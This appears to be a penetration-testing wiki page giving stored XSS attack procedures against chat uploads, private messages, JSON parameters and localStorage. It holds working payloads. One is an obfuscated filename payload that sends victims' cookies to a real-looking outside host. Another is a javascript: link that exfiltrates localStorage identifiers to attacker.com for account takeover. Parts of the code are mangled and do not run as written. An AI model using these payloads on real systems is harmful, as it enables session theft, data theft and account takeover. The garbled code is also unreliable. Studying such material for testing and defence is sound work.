Stored Cross Site Scripting

Check List

Methodology

Black Box

Blind XSS

Set up an HTTP/HTTPS proxy (e.g., Burp Suite) and enable Intercept

Open the target support/chat interface and start uploading a file to the chat

When the upload request is captured, pause it in the proxy (Intercept)

Modify the filename field in the intercepted upload request to the exact string below

"><img src=1 onerror="url=String104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,99,115,109,111,110,101,121,47,105,110,100,101,120,46,112,104,112,63,116,111,107,101,110,115,61+encodeURIComponent(document['cookie']);xhttp=&#x20new&#x20XMLHttpRequest();xhttp'GET',url,true;xhttp'send';

Forward the modified request so the file with the altered filename appears in the chat

Open or refresh the support chat page; when the filename containing the payload is rendered, the XSS should trigger

XSS in Private Messaging

Go to another users profile

Click private message

Type any subject

Type the following message Test<iframe src=javascript:alert(1) width=0 height=0 style=display:none;></iframe>

Send the message

View the message (triggers the XSS)

Wait for the victim to read the message

XSS In JSON Parameter

After checking the api requests that contain json parameters, check them

After checking once again, you will go to this api that has been created and a request has been made, and intercept the request

Inject inside parameters using XSS payloads

We can also inject into the ipAddress parameters

For example, the request below is a real example

{
    "ipAddress": "<svg on onload=(alert)(document.domain)>",
    "callBackURL":"dssdsd"
}

After sending the request to the server, it may give us an error code 400 in the response, but after sending the request, the payload was injected and the vulnerability occurred

localStorage Data Exfiltration To An Attacker Server Via XSS

Open Chrome DevTools Press F12, navigate to Sources > Page tab

Search JavaScript Files Use Ctrl+F to search for keywords: path:, url:, api/, v1/

Identify Hidden Endpoint Locate unlinked POST endpoint like /platform/apps/lighthouse-homepage from fetch() call

Test Basic XSS Payload Submit POST request with body: {"userInput": "<a href="javascript:alert(1)">clickme"}

Verify XSS Execution Confirm alert(1) popup proving unsanitized rendering

Inspect LocalStorage In DevTools Console, run JSON.stringify(localStorage) to identify sensitive keys

Craft Regex Exfiltration Payload , use

<a href="javascript:var match=JSON.stringify(localStorage).match(/ZNavIdentity\.userId=[^&]+&currEntityId=[^&]+/);if(match)fetch('https://attacker.com/?data='+encodeURIComponent(match[0]))">Click to "Verify"</a>

Submit Stored XSS Payload POST {"userInput": [above payload]} to store malicious link

Monitor Attacker Server Check https://attacker.com for exfiltrated userId and currEntityId from LocalStorage

Verify Account Takeover Confirm stolen PII enables full account access and privilege escalation

White Box

Cheat Sheet

PreviousReflected Cross Site Scripting NextHTTP Verb Tampering

Last updated 1 month ago

hashtagCheck List

hashtagMethodology

hashtagBlack Box

hashtagBlind XSSarrow-up-right

hashtagXSS in Private Messagingarrow-up-right

hashtagXSS In JSON Parameterarrow-up-right

hashtaglocalStorage Data Exfiltration To An Attacker Server Via XSSarrow-up-right

hashtagWhite Box

hashtagCheat Sheet